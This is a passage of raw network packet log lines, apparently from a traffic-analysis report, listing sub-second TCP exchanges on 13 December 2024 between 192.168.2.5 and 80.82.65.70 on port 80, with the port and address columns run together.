                                          Dec 13, 2024 06:12:59.154680014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.155360937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.155483961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.155554056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.155554056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.156248093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.156292915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.156347990 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.156478882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.157108068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.157154083 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.157203913 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.157284021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.157964945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.158010960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.158092022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.158171892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.158848047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.158900976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.159024954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.159076929 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.159872055 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.159919977 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.159975052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.160021067 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.160571098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.160615921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.160691023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.160741091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.161448956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.161499023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.161566019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.161614895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.162328005 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.162398100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.162432909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.162480116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.163197994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.163244963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.163350105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.163400888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.164058924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.164160013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.164177895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.164319038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.164942980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.165054083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.165056944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.165129900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.165807962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.165864944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.165903091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.165950060 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.166666985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.166719913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.166830063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.167020082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.167543888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.167603016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.167643070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.167689085 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.168420076 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.168466091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.168503046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.168545008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.169294119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.169339895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.169397116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.169512033 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.170164108 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.170274019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.170350075 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.170394897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.171036005 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.171077967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.171109915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.171155930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.171921015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.171964884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.172003031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.172055006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.172795057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.172844887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.172880888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.172955990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.173651934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.173702955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.173741102 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.173815012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.174510956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.174561024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.229708910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.229772091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.229882956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.229938030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.230101109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.230159998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.230202913 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.230261087 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.230962992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.230983973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.231012106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.231044054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.231834888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.231944084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.231992960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.232686996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.232777119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.232811928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.232872009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.233587027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.233661890 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.233712912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.233880043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.234473944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.234524012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.234571934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.234623909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.235343933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.235395908 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.235440016 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.235511065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.236207962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.236299038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.236315966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.236361980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.237200022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.237268925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.237314939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.237354040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.237942934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.237982988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.238027096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.238833904 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.238881111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.238945961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.239017963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.239680052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.239731073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.239788055 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.239836931 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.240535021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.240575075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.266180038 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.266319990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.266340017 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.266382933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.266478062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.266540051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.266597986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.266700983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.267349958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.267410040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.267457008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.267541885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.268230915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.268285990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.268383026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.268477917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.269113064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.269169092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.269238949 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.269288063 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.269983053 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.270049095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.270126104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.270170927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.270838976 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.270895958 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.270935059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.270998001 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.271723986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.271770954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.271820068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.271867037 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.272732973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.272850037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.272872925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.272907019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.273466110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.273556948 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.273670912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.273751974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.309952974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.310013056 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.310237885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.310301065 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.310520887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.310586929 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.311099052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.311158895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.311224937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.311950922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.312009096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.347810984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.348009109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.348227024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.348269939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.348315001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.348324060 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.349113941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.349217892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.349275112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.349311113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.349980116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.350105047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.350166082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.350832939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.350955963 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.351011992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.351753950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.351807117 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.351847887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.352607012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.352659941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.352698088 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.353466988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.353518009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.353548050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.353598118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.354326010 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.354446888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.354494095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.355206013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.355356932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.355412006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.356087923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.356142998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.356199026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.356967926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.357007980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.357038021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.357040882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.357088089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.357829094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.357887030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.357922077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.357969046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.358702898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.358804941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.358808994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.358896971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.359565973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.359618902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.359658003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.359707117 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.360459089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.360527039 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.360713005 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.360801935 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.361358881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.361444950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.361484051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.361536026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.362205029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.362271070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.362307072 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.362370014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.363048077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.363110065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.363147020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.363209963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.363934040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.363991976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.364037037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.364125967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.364801884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.364932060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.365000963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.365652084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.365768909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.365819931 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.366547108 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.366594076 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.366662979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.367407084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.367463112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.367537975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.367686033 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.368278980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.368335962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.368418932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.368468046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.369168997 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.369215965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.369259119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.369932890 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.370027065 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.370070934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.370074987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.370124102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.421735048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.421895027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.422061920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.422061920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.422137022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.422218084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.422275066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.423006058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.423063993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.423105001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.423154116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.423871040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.423918009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.423955917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424134016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.424748898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424802065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.424849033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424920082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.425614119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.425672054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.425730944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.425997019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.426506996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.426564932 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.426599979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.426654100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.427350044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.427406073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.427445889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.427503109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.428217888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.428277969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.428319931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.428376913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429117918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.429179907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429202080 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.429251909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429969072 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430018902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430051088 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430104017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430836916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430896044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430944920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431014061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.431696892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431746960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.431787014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431869030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.432549000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.432749987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.458452940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458544016 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458633900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.458848953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458982944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.459152937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.459743023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.459799051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.459837914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.460613012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.460664988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.460728884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.461472034 CET804978680.82.65.70192.168.2.5
